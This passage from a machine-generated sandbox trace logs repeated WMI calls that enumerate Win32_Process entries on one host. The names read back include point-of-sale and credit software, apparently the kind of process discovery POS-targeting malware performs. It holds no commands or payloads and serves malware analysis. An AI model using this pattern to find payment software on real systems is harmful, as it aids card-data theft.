riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5713250) returned 0x0 [0279.661] IUnknown:AddRef (This=0x5713250) returned 0x4 [0279.661] IUnknown:Release (This=0x5713250) returned 0x3 [0279.661] IUnknown:Release (This=0x5713250) returned 0x2 [0279.661] CoTaskMemFree (pv=0x57161b0) [0279.661] IUnknown:AddRef (This=0x5713250) returned 0x3 [0279.661] IWbemClassObject:Get (in: This=0x5713250, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.662] IWbemClassObject:Get (in: This=0x5713250, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.662] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.662] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.662] IUnknown:Release (This=0x500344) returned 0x1 [0279.663] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x57161b0) returned 0x0 [0279.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x57161b0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.663] WbemDefPath:IClassFactory:CreateInstance (in: This=0x57161b0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e8c8) returned 0x0 [0279.663] WbemDefPath:IUnknown:Release (This=0x57161b0) returned 0x0 [0279.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e8c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e8c8) returned 0x0 [0279.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e8c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.664] WbemDefPath:IUnknown:AddRef (This=0x570e8c8) returned 0x3 [0279.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e8c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e8c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e8c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x57161c0) returned 0x0 [0279.664] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x57161c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.664] WbemDefPath:IUnknown:Release (This=0x57161c0) returned 0x3 [0279.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e8c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.665] WbemDefPath:IUnknown:Release (This=0x570e8c8) returned 0x2 [0279.665] WbemDefPath:IUnknown:Release (This=0x570e8c8) returned 0x1 [0279.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e8c8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e8c8) returned 0x0 [0279.665] WbemDefPath:IUnknown:AddRef (This=0x570e8c8) returned 0x3 [0279.665] WbemDefPath:IUnknown:Release (This=0x570e8c8) returned 0x2 [0279.665] WbemDefPath:IWbemPath:SetText (This=0x570e8c8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"") returned 0x0 [0279.665] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.665] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.665] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.665] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.666] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.666] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.666] IWbemClassObject:Get (in: This=0x5713250, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d49bc*=0, plFlavor=0x27d49c0*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="accupos.exe", varVal2=0x0), pType=0x27d49bc*=8, plFlavor=0x27d49c0*=0) returned 0x0 [0279.666] IWbemClassObject:Get (in: This=0x5713250, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d49bc*=8, plFlavor=0x27d49c0*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="accupos.exe", varVal2=0x0), pType=0x27d49bc*=8, plFlavor=0x27d49c0*=0) returned 0x0 [0279.666] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x57161f0, puReturned=0x27bb39c | out: apObjects=0x57161f0*=0x57133e8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.677] IUnknown:QueryInterface (in: This=0x57133e8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57133e8) returned 0x0 [0279.677] IUnknown:QueryInterface (in: This=0x57133e8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.677] IUnknown:QueryInterface (in: This=0x57133e8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.678] IUnknown:AddRef (This=0x57133e8) returned 0x3 [0279.678] IUnknown:QueryInterface (in: This=0x57133e8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.678] IUnknown:QueryInterface (in: This=0x57133e8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.678] IUnknown:QueryInterface (in: This=0x57133e8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57133ec) returned 0x0 [0279.678] IMarshal:GetUnmarshalClass (in: This=0x57133ec, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.678] IUnknown:Release (This=0x57133ec) returned 0x3 [0279.678] IUnknown:QueryInterface (in: This=0x57133e8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.679] IUnknown:Release (This=0x57133e8) returned 0x2 [0279.679] IUnknown:QueryInterface (in: This=0x57133e8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57133e8) returned 0x0 [0279.679] IUnknown:AddRef (This=0x57133e8) returned 0x4 [0279.679] IUnknown:Release (This=0x57133e8) returned 0x3 [0279.679] IUnknown:Release (This=0x57133e8) returned 0x2 [0279.679] CoTaskMemFree (pv=0x57161f0) [0279.679] IUnknown:AddRef (This=0x57133e8) returned 0x3 [0279.680] IWbemClassObject:Get (in: This=0x57133e8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.680] IWbemClassObject:Get (in: This=0x57133e8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.680] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.680] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.680] IUnknown:Release (This=0x500344) returned 0x1 [0279.681] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x57161f0) returned 0x0 [0279.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x57161f0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.681] WbemDefPath:IClassFactory:CreateInstance (in: This=0x57161f0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e9a8) returned 0x0 [0279.681] WbemDefPath:IUnknown:Release (This=0x57161f0) returned 0x0 [0279.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e9a8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e9a8) returned 0x0 [0279.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e9a8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.682] WbemDefPath:IUnknown:AddRef (This=0x570e9a8) returned 0x3 [0279.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e9a8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e9a8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e9a8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716200) returned 0x0 [0279.682] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716200, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.682] WbemDefPath:IUnknown:Release (This=0x5716200) returned 0x3 [0279.683] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e9a8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.683] WbemDefPath:IUnknown:Release (This=0x570e9a8) returned 0x2 [0279.683] WbemDefPath:IUnknown:Release (This=0x570e9a8) returned 0x1 [0279.683] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e9a8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e9a8) returned 0x0 [0279.683] WbemDefPath:IUnknown:AddRef (This=0x570e9a8) returned 0x3 [0279.683] WbemDefPath:IUnknown:Release (This=0x570e9a8) returned 0x2 [0279.683] WbemDefPath:IWbemPath:SetText (This=0x570e9a8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x0 [0279.683] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.683] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.684] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.684] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.684] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.684] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.684] IWbemClassObject:Get (in: This=0x57133e8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d5228*=0, plFlavor=0x27d522c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="creditservice.exe", varVal2=0x0), pType=0x27d5228*=8, plFlavor=0x27d522c*=0) returned 0x0 [0279.685] IWbemClassObject:Get (in: This=0x57133e8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d5228*=8, plFlavor=0x27d522c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="creditservice.exe", varVal2=0x0), pType=0x27d5228*=8, plFlavor=0x27d522c*=0) returned 0x0 [0279.685] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x5716230, puReturned=0x27bb39c | out: apObjects=0x5716230*=0x5713580, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.686] IUnknown:QueryInterface (in: This=0x5713580, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5713580) returned 0x0 [0279.686] IUnknown:QueryInterface (in: This=0x5713580, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.686] IUnknown:QueryInterface (in: This=0x5713580, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.686] IUnknown:AddRef (This=0x5713580) returned 0x3 [0279.686] IUnknown:QueryInterface (in: This=0x5713580, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.686] IUnknown:QueryInterface (in: This=0x5713580, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.686] IUnknown:QueryInterface (in: This=0x5713580, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5713584) returned 0x0 [0279.686] IMarshal:GetUnmarshalClass (in: This=0x5713584, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.686] IUnknown:Release (This=0x5713584) returned 0x3 [0279.687] IUnknown:QueryInterface (in: This=0x5713580, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.687] IUnknown:Release (This=0x5713580) returned 0x2 [0279.688] IWbemClassObject:Get (in: This=0x5713580, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.688] IWbemClassObject:Get (in: This=0x5713580, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2076\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.688] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.688] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.688] IUnknown:Release (This=0x500344) returned 0x1 [0279.689] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x5716230) returned 0x0 [0279.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x5716230, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, 